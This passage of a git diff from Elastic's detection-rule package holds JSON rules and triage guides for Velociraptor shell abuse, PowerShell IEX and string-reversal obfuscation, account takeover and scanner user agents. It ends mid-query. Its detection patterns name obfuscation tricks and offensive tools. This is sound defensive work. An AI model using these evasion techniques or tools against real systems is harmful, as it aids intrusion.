Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Shell Execution via Velociraptor", + "note": "## Triage and analysis\n\n### Investigating Suspicious Shell Execution via Velociraptor\n\nVelociraptor is a legitimate endpoint visibility and response tool. Threat actors have been observed deploying it on compromised systems to run shell commands (cmd, PowerShell, rundll32), making their activity look like normal Velociraptor-collector behavior.\n\n### Possible investigation steps\n\n- Confirm the parent process name matches a Velociraptor binary (e.g. velociraptor.exe, Velociraptor.exe) and the child is cmd.exe, powershell.exe, or rundll32.exe.\n- Review the child process command line for suspicious or interactive commands (e.g. download, lateral movement, credential access) versus known Velociraptor artifact scripts (Get-LocalGroupMember, Get-Date, registry queries, Velociraptor Tools module).\n- Identify how Velociraptor was installed (dropped by another process, scheduled task, service); correlate with earlier process or file events on the host.\n- Check whether the Velociraptor executable path and code signature are expected (e.g. Program Files vs. temp or user writable); unauthorized installs are often from non-standard paths.\n- Correlate with other alerts for the same host or user (initial access, persistence, C2) to determine if this is abuse vs. legitimate IR/DFIR use.\n\n### False positive analysis\n\n- Legitimate Velociraptor artifacts that run Get-LocalGroupMember, Get-Date, registry Run key checks, or Velociraptor Tools PowerShell module are excluded by the rule; remaining FPs may be custom artifacts. Allowlist by command-line pattern or host if you use Velociraptor for authorized IR and see known-good artifacts.\n\n### Response and remediation\n\n- If abuse is confirmed: isolate the host, terminate the Velociraptor and child shell processes, and remove the Velociraptor installation (binary, service, config).\n- Determine how Velociraptor was deployed and close the initial access vector; rotate credentials for affected accounts.\n- If the deployment was authorized (IR/DFIR), document and tune the rule or add an exception to reduce noise.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and\n process.parent.name : \"velociraptor.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"rundll32.exe\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBMAG8AYwBhAGwARwByAG8AdQBwAE0AZQBtAGIAZQBy*\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBEAGEAdABl*\" and process.command_line : \"*-Format*\") and\n not (process.name : \"cmd.exe\" and process.command_line : \"*start*127.0.0.1:8889*\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBJAHQAZQBt*\" and process.command_line : \"*UgBlAGcAaQBzAHQAcgB5*\" and process.command_line : \"*UgB1AG4A*\") and\n not (process.name : \"powershell.exe\" and\n process.args : (\"RwBlAHQALQ*\", \"UgBlAG0AbwB2AGUALQBJAHQAZQBtACA*\", \"C:\\\\Program Files\\\\Velociraptor\\\\thor.db\",\n \"import-module \\\"C:\\\\Program Files\\\\Velociraptor\\\\Tools\\\\*\"))\n", + "references": [ + "https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399", + "https://attack.mitre.org/techniques/T1219/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aeca498-1e3d-4496-9e12-6ef40047eb23", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "9aeca498-1e3d-4496-9e12-6ef40047eb23_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json b/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json deleted file mode 100644 index f2ca4cf8517..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json +++ /dev/null @@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use negative index ranges to reverse the contents of a string or array at runtime as a form of obfuscation. This technique avoids direct use of reversal functions by iterating through array elements in reverse order. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "PowerShell Obfuscation via Negative Index String Reversal", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating PowerShell Obfuscation via Negative Index String Reversal\n\nPowerShell, a powerful scripting language, can be exploited by adversaries using obfuscation techniques like negative index string reversal to evade detection. This method manipulates strings or arrays by iterating in reverse, bypassing static analysis tools. The detection rule identifies scripts with obfuscation patterns by analyzing script length and specific indexing patterns, flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` to understand the script's intent and identify any suspicious or malicious behavior.\n- Check the `host.name` and `user.id` fields to determine the affected system and user, assessing if they are high-value targets or have a history of similar alerts.\n- Analyze the `file.path` to identify the location of the script and assess if it is in a common or suspicious directory.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` to trace the execution flow and determine if this script is part of a larger, potentially malicious sequence.\n- Correlate the `agent.id` with other logs to see if there are additional related activities or alerts from the same endpoint.\n- Examine the `count` of detected patterns to assess the level of obfuscation and potential threat severity.\n\n### False positive analysis\n\n- Scripts containing the keyword \"GENESIS-5654\" are known false positives and are automatically excluded from triggering alerts. Ensure that any legitimate scripts using this keyword are documented to prevent unnecessary investigations.\n- Legitimate administrative scripts that use negative indexing for valid purposes may trigger false positives. Review these scripts and consider adding them to an exception list if they are frequently flagged but verified as non-malicious.\n- Automated scripts generated by trusted software that use similar obfuscation patterns for performance or compatibility reasons can be excluded by identifying unique identifiers or patterns within these scripts and updating the exclusion criteria accordingly.\n- Regularly update the exclusion list to include new patterns or identifiers from trusted sources as they are identified, ensuring that legitimate activities are not hindered by the detection rule.\n- Collaborate with IT and security teams to maintain a list of known safe scripts and their characteristics, which can be referenced when analyzing potential false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the PowerShell script block text and related logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential unauthorized access.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"\\$\\w+\\[\\-\\s?1\\.\\.\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n// FP Patterns\n| where not powershell.file.script_block_text like \"*GENESIS-5654*\"\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "9edd1804-83c7-4e48-b97d-c776b4c97564", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "9edd1804-83c7-4e48-b97d-c776b4c97564_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json b/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json deleted file mode 100644 index e701ecd1ff8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json +++ /dev/null @@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command by accessing and indexing the string representation of method references. This obfuscation technique uses constructs like ''.IndexOf.ToString() to expose method metadata as a string, then extracts specific characters through indexed access and joins them to form IEX, bypassing static keyword detection and evading defenses such as AMSI.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Dynamic IEX Reconstruction via Method String Access", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic IEX Reconstruction via Method String Access\n\nPowerShell's flexibility allows dynamic command execution, which adversaries exploit by obfuscating commands like Invoke-Expression (IEX). They manipulate method strings to reconstruct IEX, evading static detection. The detection rule identifies scripts using this obfuscation by analyzing patterns in method string access, flagging suspicious activity for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script that triggered the alert. Look for any suspicious patterns or obfuscation techniques.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and user.id fields to identify the machine and user account involved in executing the script, which can help assess whether the activity aligns with expected behavior.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other PowerShell activities on the host, providing a broader view of the script's execution context.\n- Investigate the agent.id field to verify the endpoint's security posture and ensure that it is up-to-date with the latest security patches and configurations.\n\n### False positive analysis\n\n- Scripts with legitimate use of string manipulation methods like IndexOf or SubString may trigger false positives if they are part of complex PowerShell scripts used in administrative tasks. To manage this, review the context of the script and consider adding exceptions for known safe scripts or users.\n- Automated scripts from trusted software that perform extensive string operations for configuration or data processing might be flagged. Identify these scripts and exclude them by their script block ID or file path to prevent unnecessary alerts.\n- Development environments where PowerShell is used for testing or debugging purposes may generate alerts due to frequent use of string manipulation. Implement exclusions based on host names or user IDs associated with these environments to reduce noise.\n- Security tools or monitoring solutions that use PowerShell for log analysis or system checks might inadvertently match the detection pattern. Verify the source of the script and whitelist these tools by agent ID or specific script characteristics.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and script block ID from the alert to understand the scope and intent of the obfuscation technique used.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to identify and remove any additional threats.\n- Restore the affected system from a known good backup if the integrity of the system is compromised and cannot be assured.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)['\"]['\"].(Insert|Normalize|Chars|substring|Remove|LastIndexOfAny|LastIndexOf|IsNormalized|IndexOfAny|IndexOf)[^\\[]+\\[\\d+,\\d+,\\d+\\]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n| where not (\n file.directory like \"C:\\\\\\\\Program Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\" or\n file.directory like \"C:\\\\\\\\Users\\\\\\\\*\\\\\\\\Documents\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\"\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "9f432a8b-9588-4550-838e-1f77285580d3", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "9f432a8b-9588-4550-838e-1f77285580d3_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json new file mode 100644 index 00000000000..c021f8935a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location.", + "from": "now-15m", + "interval": "14m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Account Takeover - Logon from New Source IP", + "note": "## Triage and analysis\n\n### Investigating Potential Account Takeover - Logon from New Source IP\n\nAn account that historically logs in many times from a single source IP (e.g. usual workstation or VPN) and then shows successful logons from exactly one other IP with a low count may indicate credential compromise and use from a new location (account takeover).\n\n### Possible investigation steps\n\n- Confirm with the account owner whether they recently logged in from the new source IP or from a new device/location.\n- Check the new source IP for reputation, geography, and whether it is expected (e.g. corporate VPN range vs unknown).\n- Correlate with other alerts for the same user or source IP (e.g. logon failures, password changes, MFA changes).\n- Review timeline: if the \"new\" IP logon is very recent compared to the high-count IP, treat as higher priority.\n\n### False positive analysis\n\n- Legitimate use from a second device (e.g. new laptop, second office, VPN from travel) can produce exactly two IPs with one IP having few logons. Tune threshold (e.g. max_logon >= 100) or add exclusions for known VPN/remote ranges if needed.\n- Service or shared accounts that are used from multiple jump hosts or scripts may show two IPs; consider excluding known service accounts.\n\n### Response and remediation\n\n- If takeover is confirmed: force password reset, revoke sessions, and enable or enforce MFA. Disable or lock the account until the user verifies identity.\n- Investigate how credentials may have been compromised (phishing, breach, endpoint) and address the vector.\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and event.action == \"logged-in\" and winlog.event_id == \"4624\" and \n event.outcome == \"success\" and winlog.logon.type in (\"Network\", \"RemoteInteractive\") and \n\t\tsource.ip is not null and source.ip != \"127.0.0.1\" and not to_string(source.ip) like \"*::*\" and not user.name like \"*$\"\n| stats logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, source.ip\n| stats \n Esql.max_logon = MAX(logon_count),\n Esql.min_logon = MIN(logon_count),\n Esql.unique_host_count = COUNT_DISTINCT(host_names),\n Esql.host_name_values = VALUES(host_names),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.count_distinct_source_ip = COUNT_DISTINCT(source.ip) by user.name, user.id\n\n// high count of logons is often associated with service account tied to a specific source.ip, if observed in use from a new source.ip it's suspicious\n| where Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 5) and Esql.count_distinct_source_ip == 2 and Esql.unique_host_count >= 2\n| eval source.ip = MV_FIRST(Esql.source_ip_values), host.name = MV_FIRST(Esql.host_name_values)\n| KEEP user.name, user.id, host.name, source.ip, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1078/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_source_ip", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.min_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.unique_host_count", + "type": "long" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json new file mode 100644 index 00000000000..1adf059a590 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json @@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Suspicious User Agent Requests", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Suspicious User Agent Requests\n\nThis rule flags surges of web requests that advertise scanner or brute-force tool user agents, signaling active reconnaissance against your web servers and applications. A common pattern is dirsearch or gobuster sweeping for hidden paths, firing hundreds of rapid GETs across diverse URLs from one host and probing admin panels, backup folders, and robots.txt.\n\n### Possible investigation steps\n\n- Verify whether the activity aligns with approved scanners or uptime checks by cross-referencing inventories, allowlists, change windows, and egress ranges; otherwise enrich the originating IP with ASN, geolocation, and threat reputation to gauge risk.\n- Sample representative requests to identify targeted paths and payloads (e.g., admin panels, .git/.env, backups, traversal, SQLi/XSS markers) and note any successful responses or downloads that indicate information exposure.\n- Analyze request rate, methods, and status-code distribution to separate noisy recon from successful discovery or brute-force patterns, highlighting any POST/PUT with nontrivial bodies.\n- Correlate the same client across hosts and security layers (application/auth logs, WAF/CDN, IDS) to determine whether it is scanning multiple services, triggering signatures, or attempting credential stuffing.\n- Assess user-agent authenticity and evasiveness by comparing HTTP header order/values and TLS fingerprints (JA3/JA4) to expected clients, and verify true client identity via forwarded-for headers if behind a proxy or CDN.\n\n### False positive analysis\n\n- Legitimate, scheduled vulnerability assessments by internal teams (e.g., Nessus, Nikto, or OpenVAS) can generate large volumes of requests with those user-agent strings across many paths.\n- Developer or QA testing using discovery/fuzzing or intercept-proxy tools (Dirsearch, Gobuster, Ffuf, Burp, or OWASP ZAP) may unintentionally target production hosts, producing a short-lived spike with diverse URLs.\n\n### Response and remediation\n\n- Immediately contain by blocking or rate-limiting the originating IPs at the WAF/CDN and edge firewall, and add temporary rules to drop or challenge requests that advertise tool user agents such as \"nikto\", \"sqlmap\", \"dirsearch\", \"wpscan\", \"gobuster\", or \"burp\".\n- If traffic is proxied (CDN/reverse proxy), identify the true client via forwarded headers and extend blocks at both layers, enabling bot management or JS challenges on swept paths like /admin, /.git, /.env, /backup, and common discovery endpoints.\n- Eradicate exposure by removing or restricting access to sensitive files and directories uncovered by the scans, rotating any credentials or API keys found, invalidating active sessions, and disabling public access to administrative panels until hardened.\n- Recover by verifying no unauthorized changes or data exfiltration occurred, tuning per-IP and per-path rate limits to prevent path-sweeps while preserving legitimate traffic, and reintroducing normal rules only after fixes are deployed and stability is confirmed.\n- Escalate to incident response if sensitive files are successfully downloaded (HTTP 200/206 on /.git, /.env, or backups), any login or account creation succeeds, multiple hosts or environments are targeted, or activity persists after blocking via UA spoofing or rapid IP rotation.\n- Harden long term by enforcing WAF signatures for known scanner UAs and path patterns, denying directory listing and direct access to /.git, /.env, /backup and similar artifacts, requiring MFA/VPN for /admin and management APIs, and deploying auto-ban controls like fail2ban or mod_security.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n\n| eval 